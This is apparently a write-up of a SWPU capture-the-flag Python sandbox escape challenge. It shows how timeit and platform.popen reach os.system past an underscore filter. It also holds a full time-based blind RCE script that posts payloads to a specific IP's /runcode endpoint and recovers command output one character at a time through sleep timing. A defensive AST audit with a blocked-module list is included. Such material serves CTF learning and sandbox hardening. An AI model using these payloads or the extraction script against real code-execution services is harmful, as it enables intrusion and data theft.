A few days ago I took part in the eighth SWPU session. The challenges were of very high quality and I learned a lot. Here I want to summarise one of them, a Python sandbox escape challenge.
The challenge filters very strictly: file reading and writing, network requests and a number of dangerous modules are banned. Even underscores are detected, which makes __builtin__ and the [].__class__.__base__.__subclasses__() magic-method chain unusable.
In the end I learned that a built-in module, timeit, can be used. Many Python beginners use the timeit module to measure how long a piece of code takes to run; a look at its documentation shows that it can lead to arbitrary code execution, because the statement it times is passed in as a string and then compiled and executed.
# coding:utf-8
import timeit
# timeit compiles the string and runs it, so the string can pull in os through __import__
# (the command string was lost from the original snippet; 'id' stands in for it here)
timeit.timeit("__import__('os').system('id')", number=1)
There is another module that also works: platform.
import platform
# platform.popen (Python 2) wraps os.popen and returns the command's output
platform.popen('id', mode='r', bufsize=-1).read()
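From the defender's side, the two snippets above show what a text filter on underscores and dangerous module names misses. As an added example (not from this post or from the challenge), here is an AST-level audit a code-runner sandbox could apply to a submission before executing it; the blocked-module and blocked-builtin sets are my own choice, and the three inputs are constructed from the snippets on this page. It goes a step beyond the page's two sinks by also scanning every string literal that parses as Python, which is how the timeit payload carries its real code.

```python
import ast

# Modules a code-runner sandbox has no reason to expose. timeit and platform are
# listed because, as the page shows, both reach os.system / a shell pipe.
BLOCKED_MODULES = {"os", "sys", "subprocess", "timeit", "platform", "socket",
                   "importlib", "ctypes", "commands", "pty"}
# Builtins that turn strings into code or reach arbitrary objects.
BLOCKED_BUILTINS = {"eval", "exec", "compile", "__import__", "getattr",
                    "open", "execfile", "input", "reload"}

def _scan(tree):
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in BLOCKED_MODULES:
                    findings.append("import of blocked module %s" % root)
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in BLOCKED_MODULES:
                findings.append("import from blocked module %s" % node.module)
        elif isinstance(node, ast.Name) and node.id in BLOCKED_BUILTINS:
            findings.append("use of blocked builtin %s" % node.id)
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append("dunder attribute access %s" % node.attr)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # The timeit trick hides the real code inside a string literal, so
            # any string that itself parses as Python is scanned the same way.
            try:
                inner = ast.parse(node.value)
            except (SyntaxError, ValueError):
                continue
            findings += ["in string literal: " + f for f in _scan(inner)]
    return findings

def audit_submission(src):
    """Return findings for a submitted snippet; an empty list means none."""
    try:
        return _scan(ast.parse(src))
    except SyntaxError as e:
        return ["does not parse: %s" % e]

# Constructed inputs: the two payloads from this page and a harmless snippet.
TIMEIT_PAYLOAD = 'import timeit\ntimeit.timeit("__import__(\'os\').system(\'id\')", number=1)\n'
PLATFORM_PAYLOAD = "import platform\nplatform.popen('id', mode='r', bufsize=-1).read()\n"
BENIGN = "import math\nprint(math.sqrt(2))\n"

if __name__ == "__main__":
    for name, src in [("timeit", TIMEIT_PAYLOAD), ("platform", PLATFORM_PAYLOAD), ("benign", BENIGN)]:
        print(name, audit_submission(src))
```

A check like this only narrows the surface; the submission should still run in a separate, resource-limited process without network access, which is what actually bounds the damage when a filter is bypassed.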
Inside the timeit string the os module is loaded through the __import__ built-in, after which arbitrary commands can be executed. However, cat flag produces no echo: what comes back is only the execution time of the code. In addition, I also banned outgoing network requests here, so you cannot use CloudEye or a similar out-of-band channel to get the result of the command back.
So this is a special case: command execution with no echo and no access to the external network. How do you get the result back? The answer is time-based RCE: the command is made to sleep when a condition on one character of its output holds, and the request's response time tells you whether it did.
You can see the author's blog http://icematcha.win/?p=532
The final script, which works like a blind injection, is as follows:
#!/usr/bin/python
#coding:utf-8
#Author:icematcha
import requests
import sys
import base64

# Candidate characters of the base32 output. The original listed them in lowercase;
# base32 emits uppercase letters and b32decode expects them, so they are uppercased here.
payloads = "QWERTYUIOPASDFGHJKLZXCVBNM1234567890="

def request(url, data, timeout):
    # A normal response comes back within the timeout; a sleeping command does not,
    # so a timeout (any exception) is treated as "condition true".
    try:
        res = requests.post(url, data=data, timeout=timeout)
        return res.content
    except:
        return True

def get_length(url, cmd, timeout):
    length = ''
    # First find how many digits the length has: the first position where cut yields nothing.
    for i in xrange(1, 10):
        value = '''#!/usr/bin/python
#coding:utf-8
import timeit
timeit.timeit("__import__('os').system('if [ $(%s|base32|wc -c|cut -c%s) = ];then sleep 2;fi')", number=1)''' % (cmd, i)
        data = {'process': value}
        res = request(url, data, timeout)
        if res:
            llength = i
            break
    # Then recover the digits one position at a time.
    for i in xrange(1, llength):
        for _ in xrange(1, 10):
            value = '''#!/usr/bin/python
#coding:utf-8
import timeit
timeit.timeit("__import__('os').system('if [ $(%s|base32|wc -c|cut -c%s) = %s ];then sleep 2;fi')", number=1)''' % (cmd, i, _)
            data = {'process': value}
            if request(url, data, timeout):
                length += str(_)
                print length
                break
    return length

def get_content(url, cmd, timeout, length):
    content = ''
    # Recover the base32-encoded output one character at a time.
    for i in xrange(1, int(length) + 1):
        for payload in payloads:
            value = '''#!/usr/bin/python
#coding:utf-8
import timeit
timeit.timeit("__import__('os').system('if [ $(%s|base32|cut -c%s) = %s ];then sleep 2;fi')", number=1)''' % (cmd, i, payload)
            data = {'process': value}
            if request(url, data, timeout):
                content += payload
                print content
                break
    return content

if __name__ == '__main__':
    length = get_length('http://47.95.252.234/runcode', 'cat flag', 2.0)
    print "## The base32 of content's length is: %s" % length
    content = get_content('http://47.95.252.234/runcode', 'cat flag', 2.0, length)
    print "## The base32 of content is: %s" % content
    print "## The command result content is: %s" % base64.b32decode(content).strip()
Remember a python sandbox escape bypass (time based RCE)